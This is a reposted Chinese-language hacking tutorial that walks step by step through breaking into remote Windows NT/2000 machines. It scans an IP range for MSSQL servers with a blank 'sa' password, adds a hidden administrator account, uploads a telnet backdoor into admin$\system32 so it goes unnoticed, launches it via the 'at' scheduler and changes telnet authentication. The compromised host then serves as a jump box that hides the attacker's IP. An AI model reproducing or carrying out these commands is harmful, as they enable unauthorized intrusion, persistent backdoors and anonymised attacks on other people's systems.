轉自:synflood
今天給大家介紹一下通過sql和ipc$配合攻擊遠程主機並把它作為我們的跳板。
使用的工具:流光for nt/2000,操作平台:nt/2000
首先用"流光"搜索sql類型主機,我選的ip段是211.23.*.*,大約過了一兩分鐘,就有3台機子被掃到,其中有兩台是nt4.0,一台是win2000(用戶名:sa,密碼:<null>空),我選了win2000那台作為跳板,首先用sqlrcmd與遠程主機連接(工具-->sql遠程命令,添上ip,用戶名和密碼,按確定,差不多過幾秒鐘就會看見SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas! Connect to 211.23.*.* MSSQL Server Success, Type Command in Prompt. SQLCmd> 這句話,如果沒有看見的話,說明遠程主機不支持sql遠程登陸,我們這裡只討論可以遠程登陸),然後用net use administrator命令看看管理員在不在(沒在,不知到那去了,呵呵),下面我們要添加一個用戶,net user love 1234/add(如果顯示命令成功,或者該用戶已經存在,都說明你已經成功的添加了一個用戶名為love,密碼為1234的用戶),然後我們要自己做administrator了,net localgroup administrators love /add(如果顯示命令成功完成,或者該用戶已經是該組成員,那麼你就是administrator了)下面我們打開cmd.exe,輸入net use \\211.23.*.*\ipc$ "1234" /user:"love"命令,如果顯示命令成功完成,那麼你就有90%的希望把它作為我們的跳板,首先上傳一些文件(srv.exe,NTLM.exe),copy \hacktools\srv.exe\\211.23.*.*\admin$\system32(srv.exe是一個telnet的程序,端口是99,admin$是默認的共享,之所以上傳到那裡,是因為那裡的文件比較多,不易被發覺,NTLM.exe也要上傳),複製完了之後,我們就要啟動srv.exe這個程序了,(我們利用的是對方主機的Schedule<定時服務>首先用net time \\211.23.*.*, 看看對方主機的時間,(回顯\\211.23.*.* 的本地時間是上午09:23),然後我們用at \\211.23.*.* 09:25 srv.exe命令來啟動srv.exe(這裡要注意一下時間的換算,24小時制),回顯:新添加了一項作業 ,其作業ID=?,這樣我們只要等幾分鐘就可以telnet到主機了,過了幾分鐘……,我們用命令telnet 211.23.*.* 99來登陸主機,(如果成功會有歡迎信息)然後我們要啟動NTLM.exe了(用於修改Windows 2000 Telnet Servery身份驗證的方式)在telnet狀態下直接輸入ntlm,回車,(成功之後回顯:windows 2000 telnet dump,by assassin,all rights reserved.done!)最後一步:從新啟動對方主機的telnet服務(不用退出telnet狀態,直接輸入net stop telnet,<停止telnet服務>,net start telnet,<啟動telnet服務)(會有回顯,由於各個win2000的版本不同,啟動成功之後的的回顯也不一樣,這裡不做介紹,)我們退出telnet的狀態(命令:exit)然後在命令行下輸入telnet 211.23.*.*,依照提示,接著輸入用戶名love,密碼,1234,回車,(如果成功會有歡迎信息),就這樣,我們的跳板就做好了,你可以用它登陸倒任何開啟telnet服務的主機,比如接著輸入telnet 211.73.134.91(呵呵,可以登陸),作一個跳板是不是很簡單呢?
跳板可以在特殊的情況下隱藏你的ip,比如剛才登陸到211.73.134.91所留的ip,就是211.23.*.*的ip
呵呵,說了半天也累了,該去吃飯了,其實我也是菜鳥一個,大家共同研究研究吧!